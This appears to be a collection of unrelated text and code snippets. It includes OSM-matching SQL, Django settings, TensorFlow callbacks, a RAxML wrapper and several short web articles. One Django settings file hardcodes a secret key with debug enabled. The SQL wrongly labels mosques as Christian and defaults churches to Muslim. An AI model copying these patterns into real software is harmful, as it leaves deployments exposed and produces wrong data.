ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'muzeum','','i'),regexp_replace(P.name,'muzeum','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Muzea %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET osm_id = (
SELECT P.osm_id
FROM (
SELECT osm_id,name,way,historic FROM planet_osm_point
UNION SELECT osm_id,name,way,historic FROM planet_osm_polygon) P
WHERE
P.historic IN ('memorial','monument')
AND (
ST_DWithin(W.way,P.way,500 * (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i'))))
)
ORDER BY ST_Distance(W.way,P.way) / (0.01 + similarity(regexp_replace(COALESCE(W.name,W.title),'pam.tn.k|pomn.k','','i'),regexp_replace(P.name,'pam.tn.k|pomn.k','','i')))
LIMIT 1
)
WHERE
W.cats LIKE ('%Pomn_ky a pam_tn_ky %');
UPDATE wiki W
SET "natural" = 'peak'
WHERE W.infobox = 'hora';
UPDATE wiki W
SET
historic = 'castle',
castle_type = (CASE
WHEN W.cats LIKE ('%Hrady %') OR W.cats LIKE ('%Z__ceniny hrad_ %') THEN 'defensive'
WHEN W.cats LIKE ('%Z_mky %') THEN 'stately'
ELSE NULL
END),
ruins = (CASE
WHEN W.cats LIKE ('%Z__ceniny %') THEN 1
ELSE NULL
END)
WHERE
W.infobox in ('Hrad','hrad')
OR W.cats LIKE ('%Hrady %')
OR W.cats LIKE ('%Z_mky %')
OR W.cats LIKE ('%Z__ceniny hrad_ %');
UPDATE wiki W
SET
amenity = 'place_of_worship',
religion = (CASE
WHEN W.cats LIKE ('%Me_ity %') THEN 'christian'
WHEN W.cats LIKE ('%Synagogy %') THEN 'jewish'
ELSE 'muslim'
END),
place_of_worship = (CASE
WHEN W.cats LIKE ('%Kaple %') THEN 'chapel'
WHEN W.cats LIKE ('%Kl__tery %') THEN 'monastery'
ELSE 'church'
END)
WHERE
W.infobox in ('kostel','Kostel')
OR W.cats LIKE ('%Kostely %')
OR W.cats LIKE ('%Kaple %')
OR W.cats LIKE ('%Kl__tery %')
OR W.cats LIKE ('%Me_ity %')
OR W.cats LIKE ('%Synagogy %');
UPDATE wiki W
SET amenity = 'theatre'
WHERE
W.cats LIKE ('%Divadla %');
UPDATE wiki W
SET tourism = 'museum'
WHERE
W.cats LIKE ('%Muzeua %')
OR W.cats LIKE ('%Galerie %');
UPDATE wiki W
SET nkp = 1
WHERE
W.cats LIKE ('%N_rodn_ kulturn_ p_m_tky %');
UPDATE wiki W
SET kp = 1
WHERE
W.cats LIKE ('%Kulturn_ p_m_tky %');
"""
|
Once on The Hoe you have the opportunity to enjoy its stunning panoramic vistas over the waters of Plymouth Sound. Just visible, beyond, may be seen (in clear weather) the fine needle of the Eddystone Lighthouse (9 miles distant) and the far horizon of the Atlantic Ocean's Western Approaches to Britain and Europe. These maritime features form part of the direct physical and cultural connections, by sea, between Plymouth and the United States of America and are hence the provenance for much of the city's great weight of American heritage.
Plymouth Sound is also ranked as one of the largest natural harbours in the World. Its sheltered waters made all the safer, back in the days of sail, by the groundbreaking construction (during the years 1812 - 41) of the Plymouth Breakwater, a still visually prominent and much-valued integral aid to the Port's naval and commercial shipping today.
During the 1930's many of the greatest transatlantic ocean liners would have been seen regularly in the Sound, embarking or disembarking passengers and mail by a flotilla of tenders. These included the White Star Line's "Olympic" (Titanic's sister ship), Cunard's "Mauretania" (holder of the "Blue Riband" 1905 - 35) and "Queen Mary" (now moored at Long Beach, California), the "Ile de France", "Normandie", "George Washington", "Leviathan" and others. Earlier, during the First World War, the 33,000 men of the Canadian Expeditionary Force were disembarked here from a fleet of 32 liners upon their arrival in the Sound. |
"""
Django settings for Pokemon Only project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
DATA_DIR = os.path.join(BASE_DIR, 'data')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
with open(os.path.join(DATA_DIR, 'secret_key.txt')) as f:
SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'stall',
'tourney',
'pmo2015',
'pmo2016',
'dashboard',
'captcha',
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'msite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
'templates'
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.media',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'msite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = (
"static/",
)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
BASE_URL = 'https://www.getdaze.org'
CONTACT_EMAIL = '[email protected]'
WEIBO_URL = 'http://weibo.com/SHPMO'
CURRENT_PMO = 'pmo2020'
# Email settings
with open(os.path.join(DATA_DIR, 'secret_email.txt')) as f:
EMAIL_HOST, EMAIL_HOST_USER, EMAIL_HOST_PASSWORD = f.read().split()
EMAIL_PORT = 587
EMAIL_SUBJECT_PREFIX = '[%s] ' % CURRENT_PMO.upper()
EMAIL_USE_TLS = True
import pmo2015.helpers
CAPTCHA_CHALLENGE_FUNCT = pmo2015.helpers.word_challenge
CAPTCHA_IMAGE_SIZE = (300, 31)
PMO_LIST = {
'unknown': False,
'pmo2015': False,
'pmo2016': False,
'pmo2017': False,
'pmo2018': False,
'pmo2019': False,
'pmo2020': True
}
|
During the two seasons that followed, however, the only lofty numbers the soon-to-be 28-year-old put up were games missed. A variety of ailments, from a concussion to a lingering groin problem that ultimately required surgery, cost Green 83 games, stripping the Capitals of one of their offensive catalysts.
Last season started no differently as another groin injury forced Green to miss 13 games, but upon his return to the lineup in late March, his game clicked. He scored 10 goals in the season's last 19 games, and the Capitals went 15-2-2 en route to the team's fifth Southeast Division crown in six seasons. Green finished with 12 goals, good enough to lead all NHL defensemen for the third time in six seasons.
After the injury-induced hiatus, Washington caught a long-awaited glimpse of the player that took the city and League by storm as a faux-hawked dynamo five seasons before.
"You could tell when he came back that he was healthy," Capitals defenseman Karl Alzner told NHL.com. "You can see guys play a little more confident when they feel that way."
For a player with game-changing talent like Green, confidence is key. Years of toiling on injured reserve would take its toll on anyone, but Green "just left everything else in the dust," and focused on simply playing the game.
"I definitely felt like I was in a different [frame of mind]," Green told NHL.com. "I felt relaxed; I felt that I could come back and play the game the way I like to play.
"I went through a stretch of injuries there. I haven't played hockey in a long time consistently. I just … kind of took the weight off my shoulders and just went out and played the game again and enjoyed myself."
Part of that mental transformation stemmed from coach Adam Oates and his staff's reliance on positive reinforcement, highlighting through video what Green does well as opposed to placing emphasis on fixing mistakes.
"When you constantly hear people telling you, 'Yeah, but you're always hurt,' it's easy to think like that yourself," assistant coach Calle Johansson told NHL.com. "My part would probably be to show him stuff that he does good and pump him full of confidence. Part of my duty is to show that and to prove that to him. It doesn't do any good to dwell on the bad stuff."
In order for the Capitals to compete in the new Metropolitan Division, they will need Green to showcase the smooth-skating and puck-handling abilities that have proven to bolster their already potent lineup when he is healthy. As for how they will know that Green is back to normal, there is an easy tell.
"That would be the other team being on their heels," Johansson said. "They know when Mike Green's on the ice." |
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Common modules for callbacks."""
from __future__ import absolute_import
from __future__ import division
# from __future__ import google_type_annotations
from __future__ import print_function
import os
from typing import Any, List, MutableMapping, Optional, Text
from absl import logging
import tensorflow as tf
from official.modeling import optimization
from official.utils.misc import keras_utils
def get_callbacks(
model_checkpoint: bool = True,
include_tensorboard: bool = True,
time_history: bool = True,
track_lr: bool = True,
write_model_weights: bool = True,
apply_moving_average: bool = False,
initial_step: int = 0,
batch_size: int = 0,
log_steps: int = 0,
model_dir: Optional[str] = None,
backup_and_restore: bool = False) -> List[tf.keras.callbacks.Callback]:
"""Get all callbacks."""
model_dir = model_dir or ''
callbacks = []
if model_checkpoint:
ckpt_full_path = os.path.join(model_dir, 'model.ckpt-{epoch:04d}')
callbacks.append(
tf.keras.callbacks.ModelCheckpoint(
ckpt_full_path, save_weights_only=True, verbose=1))
if backup_and_restore:
backup_dir = os.path.join(model_dir, 'tmp')
callbacks.append(
tf.keras.callbacks.experimental.BackupAndRestore(backup_dir))
if include_tensorboard:
callbacks.append(
CustomTensorBoard(
log_dir=model_dir,
track_lr=track_lr,
initial_step=initial_step,
write_images=write_model_weights,
profile_batch=0))
if time_history:
callbacks.append(
keras_utils.TimeHistory(
batch_size,
log_steps,
logdir=model_dir if include_tensorboard else None))
if apply_moving_average:
# Save moving average model to a different file so that
# we can resume training from a checkpoint
ckpt_full_path = os.path.join(model_dir, 'average',
'model.ckpt-{epoch:04d}')
callbacks.append(
AverageModelCheckpoint(
update_weights=False,
filepath=ckpt_full_path,
save_weights_only=True,
verbose=1))
callbacks.append(MovingAverageCallback())
return callbacks
def get_scalar_from_tensor(t: tf.Tensor) -> int:
"""Utility function to convert a Tensor to a scalar."""
t = tf.keras.backend.get_value(t)
if callable(t):
return t()
else:
return t
class CustomTensorBoard(tf.keras.callbacks.TensorBoard):
"""A customized TensorBoard callback that tracks additional datapoints.
Metrics tracked:
- Global learning rate
Attributes:
log_dir: the path of the directory where to save the log files to be parsed
by TensorBoard.
track_lr: `bool`, whether or not to track the global learning rate.
initial_step: the initial step, used for preemption recovery.
**kwargs: Additional arguments for backwards compatibility. Possible key is
`period`.
"""
# TODO(b/146499062): track params, flops, log lr, l2 loss,
# classification loss
def __init__(self,
log_dir: str,
track_lr: bool = False,
initial_step: int = 0,
**kwargs):
super(CustomTensorBoard, self).__init__(log_dir=log_dir, **kwargs)
self.step = initial_step
self._track_lr = track_lr
def on_batch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
self.step += 1
if logs is None:
logs = {}
logs.update(self._calculate_metrics())
super(CustomTensorBoard, self).on_batch_begin(epoch, logs)
def on_epoch_begin(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
for k, v in metrics.items():
logging.info('Current %s: %f', k, v)
super(CustomTensorBoard, self).on_epoch_begin(epoch, logs)
def on_epoch_end(self,
epoch: int,
logs: Optional[MutableMapping[str, Any]] = None) -> None:
if logs is None:
logs = {}
metrics = self._calculate_metrics()
logs.update(metrics)
super(CustomTensorBoard, self).on_epoch_end(epoch, logs)
def _calculate_metrics(self) -> MutableMapping[str, Any]:
logs = {}
# TODO(b/149030439): disable LR reporting.
# if self._track_lr:
# logs['learning_rate'] = self._calculate_lr()
return logs
def _calculate_lr(self) -> int:
"""Calculates the learning rate given the current step."""
return get_scalar_from_tensor(
self._get_base_optimizer()._decayed_lr(var_dtype=tf.float32)) # pylint:disable=protected-access
def _get_base_optimizer(self) -> tf.keras.optimizers.Optimizer:
"""Get the base optimizer used by the current model."""
optimizer = self.model.optimizer
# The optimizer might be wrapped by another class, so unwrap it
while hasattr(optimizer, '_optimizer'):
optimizer = optimizer._optimizer # pylint:disable=protected-access
return optimizer
class MovingAverageCallback(tf.keras.callbacks.Callback):
"""A Callback to be used with a `ExponentialMovingAverage` optimizer.
Applies moving average weights to the model during validation time to test
and predict on the averaged weights rather than the current model weights.
Once training is complete, the model weights will be overwritten with the
averaged weights (by default).
Attributes:
overwrite_weights_on_train_end: Whether to overwrite the current model
weights with the averaged weights from the moving average optimizer.
**kwargs: Any additional callback arguments.
"""
def __init__(self, overwrite_weights_on_train_end: bool = False, **kwargs):
super(MovingAverageCallback, self).__init__(**kwargs)
self.overwrite_weights_on_train_end = overwrite_weights_on_train_end
def set_model(self, model: tf.keras.Model):
super(MovingAverageCallback, self).set_model(model)
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
self.model.optimizer.shadow_copy(self.model)
def on_test_begin(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_test_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
self.model.optimizer.swap_weights()
def on_train_end(self, logs: Optional[MutableMapping[Text, Any]] = None):
if self.overwrite_weights_on_train_end:
self.model.optimizer.assign_average_vars(self.model.variables)
class AverageModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
"""Saves and, optionally, assigns the averaged weights.
Taken from tfa.callbacks.AverageModelCheckpoint.
Attributes:
update_weights: If True, assign the moving average weights to the model, and
save them. If False, keep the old non-averaged weights, but the saved
model uses the average weights. See `tf.keras.callbacks.ModelCheckpoint`
for the other args.
"""
def __init__(self,
update_weights: bool,
filepath: str,
monitor: str = 'val_loss',
verbose: int = 0,
save_best_only: bool = False,
save_weights_only: bool = False,
mode: str = 'auto',
save_freq: str = 'epoch',
**kwargs):
self.update_weights = update_weights
super().__init__(filepath, monitor, verbose, save_best_only,
save_weights_only, mode, save_freq, **kwargs)
def set_model(self, model):
if not isinstance(model.optimizer, optimization.ExponentialMovingAverage):
raise TypeError('AverageModelCheckpoint is only used when training'
'with MovingAverage')
return super().set_model(model)
def _save_model(self, epoch, logs):
assert isinstance(self.model.optimizer,
optimization.ExponentialMovingAverage)
if self.update_weights:
self.model.optimizer.assign_average_vars(self.model.variables)
return super()._save_model(epoch, logs)
else:
# Note: `model.get_weights()` gives us the weights (non-ref)
# whereas `model.variables` returns references to the variables.
non_avg_weights = self.model.get_weights()
self.model.optimizer.assign_average_vars(self.model.variables)
# result is currently None, since `super._save_model` doesn't
# return anything, but this may change in the future.
result = super()._save_model(epoch, logs)
self.model.set_weights(non_avg_weights)
return result
|
Moniaive Initiative is currently working with walking charity, Living Streets (Scotland) on their national pilot project: Lower Speed Communities. With communities of all sizes expressing concern over the speed and volume of traffic on their streets, Living Streets will be working with local authorities and community organisations in four pilot communities to support the introduction of 20mph areas. In remote and rural communities such as Glencairn, cars are as vital as they are troublesome. The village of Moniaive was shaped in an era of horse-drawn vehicles, when walking was ‘the norm’, but pavements were not necessary. These narrow streets are now lined with parked cars, and groan under the weight of the HGV and agricultural traffic that powers our local economy.
Lowering vehicular speed is all about redressing the balance between walkers, cyclists, and vehicular traffic. Lower speed communities benefit from cleaner air, less traffic noise, and safer streets. At 30mph there is a 1 in 5 chance of a pedestrian being killed. At 20mph that drops to 1 in 40. Remember that next time you drive past the village school.
Our first target will be to increase local support for the principle of a 20mph area. Before we even start to look at imposing speed limits, we want to discuss where the ‘problem areas’ are, and consider a variety of alternative means of encouraging drivers to reduce their speed in these target areas.
Whether you are a pedestrian, a cyclist or a driver – a resident or a visitor – if you have comments or ideas to share on this issue, please do contact us. |
# Django settings for YAAS project.
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('admin', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'YAASdb.db', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'h3az0-*^)c!%ur(=_+a88ehr=uf9j$6**r1#1#-%j2h8_&w!c^'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'YAAS.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'YAAS.wsgi.application'
import os
TEMPLATE_DIRS = (os.path.join(os.path.dirname(__file__), '..', 'templates').replace('\\','/'),)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
'YAASApp',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
|
We are a vibrant community-based support network that empowers SCI survivors and their families.
We are a group for all those affected by spinal cord injury - new and veteran, family and friends.
OK, SO WHY OREGON SCI?
Our vision is to build a vibrant community-based support network in which people living with SCI/D can thrive…and we are!
Find supporters, resources, and other members near you.
Drop in for a casual meet-up for survivors of SCI, their families, and all those interested in supporting.
Help us better coordinate institutional and informal resources to help those who are newly injured transition smoothly.
Functionally, what level is your injury?
This page connects Portland regional people to the world of people who've had a SCI, their experiences and valuable resources. |
import os
import sys
import logging
import re
import shutil
from glob import glob
log = logging.getLogger("main")
from nprlib.master_task import TreeTask
from nprlib.master_job import Job
from nprlib.utils import (basename, Tree, OrderedDict,
GLOBALS, RAXML_CITE, pjoin, DATATYPES, md5)
from nprlib import db
__all__ = ["Raxml"]
class Raxml(TreeTask):
def __init__(self, nodeid, alg_file, constrain_id, model,
seqtype, conf, confname, parts_id=None):
GLOBALS["citator"].add(RAXML_CITE)
base_args = OrderedDict()
self.bootstrap = conf[confname].get("_bootstrap", None)
model = model or conf[confname]["_aa_model"]
self.confname = confname
self.conf = conf
self.alg_phylip_file = alg_file
try:
self.constrain_tree = db.get_dataid(constrain_id, DATATYPES.constrain_tree)
except ValueError:
self.constrain_tree = None
self.partitions_file = parts_id
TreeTask.__init__(self, nodeid, "tree", "RaxML",
base_args, conf[confname])
max_cores = GLOBALS["_max_cores"]
appname = conf[confname]["_app"]
if max_cores > 1:
threads = conf["threading"].get("raxml-pthreads")
if threads > 1:
appname = appname.replace("raxml", "raxml-pthreads")
raxml_bin = conf["app"][appname]
else:
appname = appname.replace("raxml-pthreads", "raxml")
threads = 1
raxml_bin = conf["app"][appname]
self.raxml_bin = raxml_bin
self.threads = threads
self.seqtype = seqtype
# Process raxml options
method = conf[confname].get("_method", "GAMMA").upper()
if seqtype.lower() == "aa":
self.model_string = 'PROT%s%s' %(method, model.upper())
self.model = model
elif seqtype.lower() == "nt":
self.model_string = 'GTR%s' %method
self.model = "GTR"
else:
raise ValueError("Unknown seqtype %s", seqtype)
#inv = conf[confname].get("pinv", "").upper()
#freq = conf[confname].get("ebf", "").upper()
self.init()
def load_jobs(self):
args = OrderedDict(self.args)
args["-s"] = pjoin(GLOBALS["input_dir"], self.alg_phylip_file)
args["-m"] = self.model_string
args["-n"] = self.alg_phylip_file
if self.constrain_tree:
log.log(24, "Using constrain tree %s" %self.constrain_tree)
args["-g"] = pjoin(GLOBALS["input_dir"], self.constrain_tree)
if self.partitions_file:
log.log(24, "Using alg partitions %s" %self.partitions_file)
args['-q'] = pjoin(GLOBALS["input_dir"], self.partitions_file)
tree_job = Job(self.raxml_bin, args, parent_ids=[self.nodeid])
tree_job.jobname += "-"+self.model_string
tree_job.cores = self.threads
# Register input files necessary to run the job
tree_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
tree_job.add_input_file(self.constrain_tree)
if self.partitions_file:
tree_job.add_input_file(self.partitions_file)
self.jobs.append(tree_job)
self.out_tree_file = os.path.join(tree_job.jobdir,
"RAxML_bestTree." + self.alg_phylip_file)
if self.bootstrap == "alrt":
alrt_args = tree_job.args.copy()
if self.constrain_tree:
del alrt_args["-g"]
if self.partitions_file:
alrt_args["-q"] = args['-q']
alrt_args["-f"] = "J"
alrt_args["-t"] = self.out_tree_file
alrt_job = Job(self.raxml_bin, alrt_args,
parent_ids=[tree_job.jobid])
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.cores = self.threads
# Register necessary input files
alrt_job.add_input_file(self.alg_phylip_file)
if self.partitions_file:
alrt_job.add_input_file(self.partitions_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
elif self.bootstrap == "alrt_phyml":
alrt_args = {
"-o": "n",
"-i": self.alg_phylip_file,
"--bootstrap": "-2",
"-d": self.seqtype,
"-u": self.out_tree_file,
"--model": self.model,
"--quiet": "",
"--no_memory_check": "",
}
#if self.constrain_tree:
# alrt_args["--constraint_tree"] = self.constrain_tree
alrt_job = Job(self.conf["app"]["phyml"],
alrt_args, parent_ids=[tree_job.jobid])
alrt_job.add_input_file(self.alg_phylip_file, alrt_job.jobdir)
alrt_job.jobname += "-alrt"
alrt_job.dependencies.add(tree_job)
alrt_job.add_input_file(self.alg_phylip_file)
self.jobs.append(alrt_job)
self.alrt_job = alrt_job
else:
# Bootstrap calculation
boot_args = tree_job.args.copy()
boot_args["-n"] = "bootstraps."+boot_args["-n"]
boot_args["-N"] = int(self.bootstrap)
boot_args["-b"] = 31416
boot_job = Job(self.raxml_bin, boot_args,
parent_ids=[tree_job.jobid])
boot_job.jobname += "-%d-bootstraps" %(boot_args['-N'])
boot_job.dependencies.add(tree_job)
boot_job.cores = self.threads
# Register necessary input files
boot_job.add_input_file(self.alg_phylip_file)
if self.constrain_tree:
boot_job.add_input_file(self.constrain_tree)
if self.partitions_file:
boot_job.add_input_file(self.partitions_file)
self.jobs.append(boot_job)
# Bootstrap drawing on top of best tree
bootd_args = tree_job.args.copy()
if self.constrain_tree:
del bootd_args["-g"]
if self.partitions_file:
del bootd_args["-q"]
bootd_args["-n"] = "bootstrapped."+ tree_job.args["-n"]
bootd_args["-f"] = "b"
bootd_args["-t"] = self.out_tree_file
bootd_args["-z"] = pjoin(boot_job.jobdir, "RAxML_bootstrap." + boot_job.args["-n"])
bootd_job = Job(self.raxml_bin, bootd_args,
parent_ids=[tree_job.jobid])
bootd_job.jobname += "-bootstrapped"
bootd_job.dependencies.add(boot_job)
bootd_job.cores = self.threads
self.jobs.append(bootd_job)
self.boot_job = boot_job
self.bootd_job = bootd_job
def finish(self):
#first job is the raxml tree
def parse_alrt(match):
dist = match.groups()[0]
support = float(match.groups()[1])/100.0
return "%g:%s" %(support, dist)
if self.bootstrap == "alrt":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
"RAxML_fastTreeSH_Support." + self.alrt_job.args["-n"])
raw_nw = open(alrt_tree_file).read()
try:
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw, flags=re.MULTILINE)
except TypeError:
raw_nw = raw_nw.replace("\n","")
nw, nsubs = re.subn(":(\d+\.\d+)\[(\d+)\]", parse_alrt, raw_nw)
if nsubs == 0:
log.warning("alrt values were not detected in raxml tree!")
tree = Tree(nw)
elif self.bootstrap == "alrt_phyml":
alrt_tree_file = os.path.join(self.alrt_job.jobdir,
self.alg_phylip_file +"_phyml_tree.txt")
tree = Tree(alrt_tree_file)
else:
alrt_tree_file = os.path.join(self.bootd_job.jobdir,
"RAxML_bipartitions." + self.bootd_job.args["-n"])
nw = open(alrt_tree_file).read()
tree = Tree(nw)
tree.support = 100
for n in tree.traverse():
if n.support >1:
n.support /= 100.
else:
n.support = 0
TreeTask.store_data(self, tree.write(), {})
|
Abstract: Model Governance is arguably the most important (and the most unloved) part of any Data Science project within any organisation. The ability to operate safely at scale is what will enable Lloyds Banking Group to use Data Science to improve the lives of our ~20m customers across the UK. We are pioneering a new way of working which combines the wide breadth of data science with the delivery rigour of DevOps and Agile. Taking the pain out of Model Governance means that Data Scientists can focus on doing what they do best: delivering game-changing models across our entire organisation. In this session we’ll share our lessons learned, the growing pains and how we’re poised to deliver the next generation of Machine Learning and AI projects within Lloyds Banking Group.
Bio: Tom has spent the past few years building the Data Science Centre of Excellence at Lloyds Banking Group. With a background in Physics and Satellite Engineering, Tom didn’t expect to end up working in the Finance sector. However, having started has career working in retail credit risk, Tom saw the potential to bring the benefits of Machine Learning and AI to the masses and is now pioneering new ways of delivering change in the UK financial sector. |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=40))
def backwards(self, orm):
# Changing field 'Location.uuid'
db.alter_column(u'mtlocation_location', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'TransitRoute.uuid'
db.alter_column(u'mtlocation_transitroute', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
# Changing field 'Region.uuid'
db.alter_column(u'mtlocation_region', 'uuid', self.gf('django.db.models.fields.CharField')(max_length=36))
models = {
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'mtlocation.gplace': {
